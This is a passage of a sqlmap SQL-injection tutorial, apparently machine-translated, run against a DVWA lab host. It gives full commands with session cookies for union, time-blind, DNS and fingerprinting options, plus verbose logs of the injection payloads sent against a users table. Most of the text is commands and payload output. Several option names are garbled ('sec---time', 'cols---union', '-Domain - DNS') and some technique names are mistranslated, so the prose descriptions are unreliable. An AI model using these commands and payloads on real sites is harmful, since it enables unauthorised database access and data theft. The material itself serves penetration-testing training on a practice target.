Specifies the injection technique
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique="BEUSTQ"
B : Based on the type of blind Boolean
E : Based on the error injection
U : joint inquiry injection
S : stacking injection
T : Blind Time Note
Q : Inline queries injection
All injection technique is used by default, --technique = "BEUSTQ"
Set the time parameters of the blinds
sec---time : Set the time delay based on blind, in seconds, five seconds by default
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique=T --time-sec=1
Joint injection parameters
cols---union : Set the number of columns joint injection, the default columns 1-10. Although by increasing the --level can increase the number of columns, but can --union-cols can set the number of fixed columns. For example: Set union test as 12-18
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-cols="12-18"
char---union : Set the character union injection, the default is NULL. When you set a higher level of level, it will be tested using a random number, because in some cases, union queries NULL test will fail, and a random number will be successful. For example: to set union of characters "123"
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-char="123" -v 3
As a union using 123 characters, the default query columns 1-10
[22:19:32] [PAYLOAD] -9103) ORDER BY 1-- JliU
[22:19:32] [PAYLOAD] -6117) ORDER BY 4864-- XFDV
[22:19:32] [PAYLOAD] -5546) UNION ALL SELECT 123-- ueOQ
[22:19:32] [PAYLOAD] -8136) UNION ALL SELECT 123,123-- ksax
[22:19:33] [PAYLOAD] -6350) UNION ALL SELECT 123,123,123-- UHzH
[22:19:33] [PAYLOAD] -4218) UNION ALL SELECT 123,123,123,123-- rbVp
[22:19:33] [PAYLOAD] -1370) UNION ALL SELECT 123,123,123,123,123-- iprn
[22:19:33] [PAYLOAD] -5507) UNION ALL SELECT 123,123,123,123,123,123-- Inhq
[22:19:33] [PAYLOAD] -9862) UNION ALL SELECT 123,123,123,123,123,123,123-- IwGO
[22:19:33] [PAYLOAD] -5351) UNION ALL SELECT 123,123,123,123,123,123,123,123-- EdWF
[22:19:33] [PAYLOAD] -3384) UNION ALL SELECT 123,123,123,123,123,123,123,123,123-- ThkG
[22:19:33] [PAYLOAD] -6285) UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123-- vyBV
from---union : injection union set table to be queried, provided as users table as a table to be queried union injection
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-from="users" -v 3
The default query string to use NULL, the query range of 1-10, the designated table users
[22:27:16] [PAYLOAD] 1) ORDER BY 1-- Vrdu
[22:27:16] [WARNING] reflective value(s) found and filtering out
[22:27:16] [PAYLOAD] 1) ORDER BY 6196-- MvfX
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL FROM users-- cmox
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL FROM users-- FwKo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL FROM users-- fmaB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL FROM users-- MuVY
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM users-- Wijp
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM users-- wYUU
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- rWYB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LvGo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LnTt
[22:27:17] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- YGVF
DNS attacks against
-Domain - DNS : DNS server by specifying the target attacks, dns service the needs of the target open 53 ports.
sqlmap -u "目标URL" --dns-domain="目标URL"
Obtain fingerprint information database
-f or --fingerprint
sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=8jh3juigrkaqipeu1oiinhcpbi; security=low" -f
Thus, the database is Mysql, the version number is 5.7
[20:15:10] [INFO] testing MySQL
[20:15:10] [INFO] confirming MySQL
[20:15:11] [INFO] the back-end DBMS is MySQL
[20:15:11] [INFO] actively fingerprinting MySQL
[20:15:11] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.7.26
html error message fingerprint: MySQL